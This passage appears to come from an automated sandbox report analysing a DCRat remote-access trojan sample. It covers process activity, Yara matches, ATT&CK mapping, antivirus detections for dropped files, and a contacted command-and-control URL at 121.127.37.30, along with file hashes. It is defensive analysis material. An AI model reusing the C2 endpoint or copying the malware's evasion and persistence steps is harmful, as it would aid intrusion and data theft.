                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595469Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595344Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595235Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 595110Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594985Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594729Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594547Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594434Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594325Jump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeThread delayed: delay time: 594219Jump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\userJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\AppDataJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: A5EbyKyjhV.exe, 00000000.00000002.1305830732.000000001C9FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2494667717.0000000000D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeCode function: 0_2_00007FFAAC6E6CA9 rdtsc 0_2_00007FFAAC6E6CA9
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeMemory allocated: page read and write | page guardJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat" Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe "C:\Program Files (x86)\windows sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe" Jump to behavior
                          Source: DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeQueries volume information: C:\Users\user\Desktop\A5EbyKyjhV.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeQueries volume information: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\A5EbyKyjhV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                          Source: C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                          Stealing of Sensitive Information

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: A5EbyKyjhV.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.A5EbyKyjhV.exe.fc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A5EbyKyjhV.exe PID: 6356, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DZNTXHJCUWXUTqOrRrGotfqdMP.exe PID: 7528, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Yara detected DCRat
                          Source: Yara matchFile source: A5EbyKyjhV.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.A5EbyKyjhV.exe.fc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000C.00000002.2496136619.000000000319D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.1242745024.0000000000FC2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A5EbyKyjhV.exe PID: 6356, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: DZNTXHJCUWXUTqOrRrGotfqdMP.exe PID: 7528, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Recovery\RuntimeBroker.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, type: DROPPED

                          Mitre Att&ck Matrix

                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity Information1
                          Scripting                          		Valid Accounts141
                          Windows Management Instrumentation                          		1
                          Scripting                          		12
                          Process Injection                          		132
                          Masquerading                          		OS Credential Dumping341
                          Security Software Discovery                          		Remote Services11
                          Archive Collected Data                          		1
                          Encrypted Channel                          		Exfiltration Over Other Network MediumAbuse Accessibility Features
                          CredentialsDomainsDefault AccountsScheduled Task/Job1
                          DLL Side-Loading                          		1
                          DLL Side-Loading                          		1
                          Disable or Modify Tools                          		LSASS Memory2
                          Process Discovery                          		Remote Desktop ProtocolData from Removable Media1
                          Non-Application Layer Protocol                          		Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
                          Virtualization/Sandbox Evasion                          		Security Account Manager251
                          Virtualization/Sandbox Evasion                          		SMB/Windows Admin SharesData from Network Shared Drive11
                          Application Layer Protocol                          		Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                          Process Injection                          		NTDS1
                          Application Window Discovery                          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                          Deobfuscate/Decode Files or Information                          		LSA Secrets1
                          Remote System Discovery                          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                          Obfuscated Files or Information                          		Cached Domain Credentials1
                          System Network Configuration Discovery                          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                          Software Packing                          		DCSync2
                          File and Directory Discovery                          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                          DLL Side-Loading                          		Proc Filesystem135
                          System Information Discovery                          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          A5EbyKyjhV.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          A5EbyKyjhV.exe100%AviraHEUR/AGEN.1309961
                          A5EbyKyjhV.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe100%AviraHEUR/AGEN.1309961
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\Desktop\HbVuFfcO.log100%AviraHEUR/AGEN.1362695
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\Desktop\OsAKJQVe.log100%AviraHEUR/AGEN.1362695
                          C:\Recovery\RuntimeBroker.exe100%AviraHEUR/AGEN.1309961
                          C:\Users\user\Desktop\PjdKZeCh.log100%AviraTR/PSW.Agent.qngqt
                          C:\Users\user\Desktop\SRkiCrbU.log100%AviraHEUR/AGEN.1300079
                          C:\Users\user\AppData\Local\Temp\kAhb7GGyxn.bat100%AviraBAT/Delbat.C
                          C:\Users\user\Desktop\PvGkFmYz.log100%AviraTR/PSW.Agent.qngqt
                          C:\Users\user\Desktop\EZjMkwXT.log100%AviraHEUR/AGEN.1300079
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe100%Joe Sandbox ML
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\HbVuFfcO.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\OsAKJQVe.log100%Joe Sandbox ML
                          C:\Recovery\RuntimeBroker.exe100%Joe Sandbox ML
                          C:\Users\user\Desktop\PjdKZeCh.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\SRkiCrbU.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\AlRNHzIf.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\PvGkFmYz.log100%Joe Sandbox ML
                          C:\Users\user\Desktop\EZjMkwXT.log100%Joe Sandbox ML
                          C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Program Files (x86)\Windows Sidebar\DZNTXHJCUWXUTqOrRrGotfqdMP.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\ProgramData\Adobe\DZNTXHJCUWXUTqOrRrGotfqdMP.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Recovery\RuntimeBroker.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat
                          C:\Users\user\Desktop\AlRNHzIf.log8%ReversingLabs
                          C:\Users\user\Desktop\CYBeSaFD.log8%ReversingLabs
                          C:\Users\user\Desktop\DyXMTSsE.log21%ReversingLabs
                          C:\Users\user\Desktop\EZjMkwXT.log17%ReversingLabs
                          C:\Users\user\Desktop\HLTcvXUr.log29%ReversingLabs
                          C:\Users\user\Desktop\HSyuVsJS.log12%ReversingLabs
                          C:\Users\user\Desktop\HbVuFfcO.log17%ReversingLabs
                          C:\Users\user\Desktop\JMBKMsmH.log25%ReversingLabs
                          C:\Users\user\Desktop\JiQSSPWn.log4%ReversingLabs
                          C:\Users\user\Desktop\MYHJZLWg.log12%ReversingLabs
                          C:\Users\user\Desktop\OsAKJQVe.log17%ReversingLabs
                          C:\Users\user\Desktop\PWlCEuly.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\PjdKZeCh.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\PvGkFmYz.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\RunsezZZ.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\SHQSLHwr.log38%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\SRkiCrbU.log25%ReversingLabs
                          C:\Users\user\Desktop\UswiSVHk.log8%ReversingLabs
                          C:\Users\user\Desktop\WgArDiDi.log4%ReversingLabs
                          C:\Users\user\Desktop\XMlAJXRO.log25%ReversingLabs
                          C:\Users\user\Desktop\ZPYieGWJ.log25%ReversingLabs
                          C:\Users\user\Desktop\ZeaApOeg.log25%ReversingLabs
                          C:\Users\user\Desktop\asIaZkme.log21%ReversingLabs
                          C:\Users\user\Desktop\cJayVGAz.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\ejzRghnX.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\gdBhXhQN.log17%ReversingLabs
                          C:\Users\user\Desktop\gzRpdDAs.log21%ReversingLabs
                          C:\Users\user\Desktop\jxryOjbr.log21%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\lPgyvanJ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\lyZggEuH.log21%ReversingLabs
                          C:\Users\user\Desktop\mEXomrcz.log50%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\noipVfbk.log8%ReversingLabs
                          C:\Users\user\Desktop\nxFpFSuh.log8%ReversingLabs
                          C:\Users\user\Desktop\olJxrfqf.log5%ReversingLabs
                          C:\Users\user\Desktop\ougxbSJc.log17%ReversingLabsByteCode-MSIL.Trojan.Whispergate
                          C:\Users\user\Desktop\pxmXXnNx.log25%ReversingLabs
                          C:\Users\user\Desktop\rAZFtXSs.log5%ReversingLabs
                          C:\Users\user\Desktop\rkXniOKV.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\tgLOyLgZ.log17%ReversingLabs
                          C:\Users\user\Desktop\uHWOOpMo.log17%ReversingLabsByteCode-MSIL.Trojan.Generic
                          C:\Users\user\Desktop\vRqeFZrR.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                          C:\Users\user\Desktop\wYpmLLZJ.log17%ReversingLabs
                          C:\Users\user\Desktop\xsCeWCWh.log8%ReversingLabs
                          C:\Users\user\Desktop\zuoNrmbc.log29%ReversingLabs
                          C:\Windows\SysWOW64\InstallShield\DZNTXHJCUWXUTqOrRrGotfqdMP.exe74%ReversingLabsByteCode-MSIL.Backdoor.DCRat

                          Unpacked PE Files

                          No Antivirus matches

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.php100%Avira URL Cloudmalware
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linu0%Avira URL Cloudsafe
                          http://121.127.37.300%Avira URL Cloudsafe

                          Domains and IPs

                          Contacted Domains

                          No contacted domains info

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linux7/Dlebase/Imagetoprivatewindows/BetterphpDefault/VideorequestprocessServerprotectwindowsPublic.phptrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://121.127.37.30DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002EB6000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://121.127.37.30/TrafficWordpressvoiddb/flower8/Pipe/temp6/JavascriptSecurepolllinux/linux/3linuDZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.0000000002CD1000.00000004.00000800.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameA5EbyKyjhV.exe, 00000000.00000002.1284740476.0000000004017000.00000004.00000800.00020000.00000000.sdmp, DZNTXHJCUWXUTqOrRrGotfqdMP.exe, 0000000C.00000002.2496136619.00000000029A1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            121.127.37.30
                            		unknownAfghanistan
                            		55732RANATECHNET-AFRANATechnologiesKabulAFtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1569209
                            Start date and time:2024-12-05 16:01:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:18
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:A5EbyKyjhV.exe
                            renamed because original name is a hash value
                            Original Sample Name:48B90C11912E9C7147D86C55D1E2CC94.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@10/63@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • VT rate limit hit for: A5EbyKyjhV.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            10:02:21API Interceptor2407893x Sleep call for process: DZNTXHJCUWXUTqOrRrGotfqdMP.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            RANATECHNET-AFRANATechnologiesKabulAFhttps://www.mediafire.com/file/oyfycncwen0a3ue/DSP_Plan_Set.zip/fileGet hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            https://meandyouj.weebly.com/Get hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            Remittance_Regulvar.htmGet hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            http://emaildlatt-mailcom-28e2uy93.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://en.softonic.comGet hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            https://solanadefimainnet.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://dreativityblocksnodes.pages.dev/Get hashmaliciousUnknownBrowse
                            • 121.127.42.98
                            http://xb2.aggressiveq9.com/21u/Get hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://nke.pages.dev/account/js-reporting/?crumb=uZ4.07kERLI&message=javascript_not_enabled&ref=/account/challenge/passwordGet hashmaliciousHTMLPhisherBrowse
                            • 121.127.42.98
                            https://files.fm/u/vtrxvgdh6wGet hashmaliciousGuLoaderBrowse
                            • 121.127.42.98

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\Desktop\AlRNHzIf.logqNdO4D18CF.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                              iN1fhAtzW2.exeGet hashmaliciousDCRatBrowse
                                based.exeGet hashmaliciousDCRat, PureLog Stealer, Xmrig, zgRATBrowse
                                  RustChecker.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                    main.exeGet hashmaliciousDCRat, Discord Token Stealer, Millenuim RAT, PureLog Stealer, zgRATBrowse
                                      file_1443.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        lsass.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          dvc2TBOZTh.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            teh76E2k50.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              FuWRu2Mg82.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                Created / dropped Files

                                                C:\Program Files (x86)\Reference Assemblies\981c2098d799b6

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:ASCII text, with very long lines (959), with no line terminators
                                                Category:dropped
                                                Size (bytes):959
                                                Entropy (8bit):5.907190190824914
                                                Encrypted:false
                                                SSDEEP:24:cwP09fnxfxKZaJOw4FtYXqkIuPwMC0co8PLio8aFzv:h0VnZxeJw4FtYXqkIr0co8Peo8u
                                                MD5:5CB1CA4329DD965B14561CF6FAEA8D96
                                                SHA1:2CEF12345560D2CE3C327D2CE1A1B931348A032D
                                                SHA-256:F99B0A30F5AA1AC3BD6479CE820517A8050503A8AE3F7BBD23FEFE5CFEB8D6C9
                                                SHA-512:DA9AF20902757ACE9EE4C52805AC73227F2F552A55E8BB61C0ABB1E6D2D8930761CD419F43B0129932EA1BF84E1703A1BC4936DF1B16E7B7974C1D52F30DB9A7
                                                Malicious:false
                                                Reputation:low
                                                Preview:n6UekClWFoxPoQArtQy7HnCQDohTY66NpUyE9odTWTAoAFzzhnJAVn093Ea6eS8IskjUc5sExfkxnYP8zsvuw51CeyK4NhyEV16afeWm4EN0CCWfzcHvhNVwsg0nuy0QqfcwbycUWI0rrA9bcoFvZChIfJr8ot1GO7KhkjEA9wZYXoErgZKGsF0n8TQRGeqmRtdu0c03kFvnnJu1EAbPivYIGgiQTw3fGxGoKU1DiRfnTNAyjZNGCbDgUUoT3jjyMPg0DGquIXqRPvz3gur3jwdptjTzphK8rraDrKvcsc8ouwQjfvxJ2qOZw0Gdx0ElNrjiUvMV8OKGyz47TuU4tAGBcBR0DSp1XXaCMsOtjbLnfIl75JKCgK1NliGTeVSpjStaY1ukfkVSycfUZU44ImVNgMbnm5PNJfEMYLiEZjh5yiZICv3JbYh67f4MaG8jVIITYT5Ow0ejFaY7xTk0BGvv7HP2QVnSk8kqaFtt0pXl381gH7YHgIhOWWVQEC7aMM8H0sgrj19WsK29QsvT6gwcaVUDudpyr6ZqAuqZaripILfMdVAVQodpagqeXc6GLLowvM9gBW2P8GTPzHjYcThCdtPeDMB7ucd7gtaRWdU4wNrTMboQ2hn1olTB7eczU4fgnWsGqSC99mQPC5RmhvEMylT4aZU1Aek1sKq0sijkfo2BUD9BN0SjzSrBDxpR7K8eCZg1Pb38MerKtRjWZToKMABZcow53RmVqX95hHwv7TXVlgSvNT2ofxSBXGYko8F41VeWSozRg2M2npy6WBrjZ7z2E7hatLH9OcdPC6djekInlZXrScOnQff3gmRUGYiVvMoKMi3aiHFyzMQpjzHQ7ess7jsZoIcFCw1YuMfuixEJarEUWlvRRRXRd6Nmzevap9vCU14WTXrJZjRPfYDDWLxuZk5y934ECoda5BAeqY74kN14o7GbasDdLBn

                                                C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\A5EbyKyjhV.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):2551808
                                                Entropy (8bit):4.648835098499072
                                                Encrypted:false
                                                SSDEEP:24576:WCihq6FXaYuCw7sULqPyZwSxIshnWIjm7vZAjX+ez87TkQPI1QOmYNnNQ671:VihHsYIlwSx9WkiLekTk1FN
                                                MD5:48B90C11912E9C7147D86C55D1E2CC94
                                                SHA1:FFC71FB727607913AA176C85F75972F1AC6FDA7C
                                                SHA-256:BB0F507A87420A0597CDC40917EA1BA9C9576D3E750DB3F9B66802B19550C9E7
                                                SHA-512:175B7358DE82827CA29ECEF204FA2451BA44E3E3FC373F65BC40D2D888D43A5D0BC778A78F714E47369B8D9A5B37FAA4106E912BB53B13791714D1C7773431F8
                                                Malicious:true
                                                Yara Hits:
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, Author: Joe Security
                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Reference Assemblies\DZNTXHJCUWXUTqOrRrGotfqdMP.exe, Author: Joe Security
                                                Antivirus:
                                                • Antivirus: Avira, Detection: 100%
                                                • Antivirus: Avira, Detection: 100%
